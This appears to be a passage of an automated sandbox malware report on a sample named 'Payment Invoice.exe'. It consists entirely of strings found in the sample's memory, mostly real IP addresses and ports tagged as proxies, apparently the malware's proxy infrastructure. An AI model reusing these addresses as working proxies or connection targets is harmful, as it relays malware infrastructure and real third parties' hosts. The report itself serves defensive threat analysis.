                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.134.236.231:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.211.182:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.211.182:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.167.191.223:1080://proxyH
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.169.83.87:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.169.83.87:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.53:7777
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.53:7777://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.198.164
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.198.164://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.198.164:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221:48678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221:48678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.180.152.94:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.16.5:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.16.5:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197F3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.10:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.10:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.130:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.130:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.40.160:8082
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.241.249.131:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.110.214.134:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.110.214.134:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.112.164.219:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.112.164.219:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.115.232.158:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.115.232.158:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.183.19:53281
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.183.19:53281://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.11.157:10219
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.11.157:10219://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.0.36:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.0.36:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317272000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.81.181:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163172D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.81.181:999://proxyp
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.243.147:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.243.147:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.210:7654
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.210:7654://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.21:7654
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.21:7654://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.209.78.75:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.209.78.75:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.209.78.76:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.136.34:7518
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.136.34:7518://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.226:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.226:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.228:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.228:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.224.247.141:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.224.247.141:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.39.27.225:1994
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.39.27.225:1994://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.57.131.122:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.57.131.122:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.57.194.28:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.65.169.37:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.65.169.37:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.66.37.200:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.66.37.200:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.74.83.25:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.74.83.25:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.0
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.217:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.217:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.218:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.218:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.13.91:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.13.91:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.248:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.248:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.249:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.249:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.22.228:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.22.228:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.74.78:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.74.78:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.79.63:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.85.45:998
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.85.45:998://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.106.220.252:9091
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.140.244.163:8118
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.140.244.163:8118://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319918000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163195FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.253.153.238:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.253.153.238:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.52.229.165:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.52.229.165:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.53.216.4:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.53.216.4:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.72.203.255
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.72.203.255://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.72.203.255:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163186F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.78.42.112:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.78.42.112:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631823E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631815E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.254.8:4216
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631824A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.254.8:4216://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.179.187.16:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.179.187.16:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.215.23.242:9091
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.215.23.242:9091://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.184.48:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.184.48:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.192.215:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.192.215:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.167:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.167:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.184:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.184:8080://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.231.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.231.188:34599
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.231.188:34599://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.46.37:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319D11000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.117.134:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.117.134:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.41.224:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.41.224:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.79.25:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.79.25:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.9.20:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.9.20:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.9.82:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.9.82:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.169.154.119
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631859F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.169.154.119://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.169.154.119:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.245.148:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.245.148:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.248.5:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.248.5:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.249.65:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.249.65:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.14:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.14:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.17:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.17:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.23:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.23:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.25:15291
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.25:15291://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.26:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.26:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.28:15294
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.28:15294://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.3:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.3:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.5:15303
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.5:15303://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.194:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.194:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.206:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.206:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.210:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.210:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.220:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.220:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.220:4145rat.com:0q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.185.105.105:4481
